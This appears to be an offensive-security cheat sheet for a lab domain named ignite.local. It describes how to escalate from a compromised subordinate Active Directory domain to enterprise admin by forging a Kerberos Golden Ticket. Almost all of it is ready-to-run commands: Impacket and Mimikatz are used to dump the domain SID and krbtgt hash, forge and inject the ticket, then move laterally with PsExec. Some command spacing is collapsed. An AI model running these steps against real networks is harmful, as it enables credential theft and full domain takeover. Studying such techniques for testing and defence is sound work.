Assume that you have two domains - one parent domain and subordinate domain(s). When you compromise the subordinate domain, you want to access to the parent or/and other domain(s). In this scenario, use a Golden ticket to get an enterprise admin access to the entire domain.
With Kali
# Get Domain SIDpythonlookupsid.pyignite/Administrator:Ignite@987@192.168.1.105# Get Krbtgt hash & domain namepythonsecretsdump.pyadministrator:Ignite@987@192.168.1.105-outputfilekrb-user-status# Create a Golden Ticketpython ticketer.py -nthash f3bc61e97fb14d18c42bcbf6c3a9055f -domain-sid S-1-5-21-3523557010-2506964455-2614950430 -domain ignite.local raj # random user
# Import it into memory export KRB5CCNAME=/root/Tools/impacket/examples/raj.ccache
Windows: Access with Golden Ticket now
# Mimikatz# Extract the “domain Name, SID, krbtgt Hash”,privilege::debuglsadump::lsa/inject/name:krbtgt# Create a Golden Ticket and access to other machines nowkerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500 /ptt
# Get an new command promptmisc::cmd# Access to another machine PsExec64.exe \\192.168.1.105cmd.exe
Windows: Access with Golden Ticket later
# Create the Golden Ticket and save it as ticket.kirbikerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500
# Import the ticket into memory kerberos::pttticket.kirbimisc::cmd# Access to other machines PsExec64.exe \\192.168.1.105cmd.exe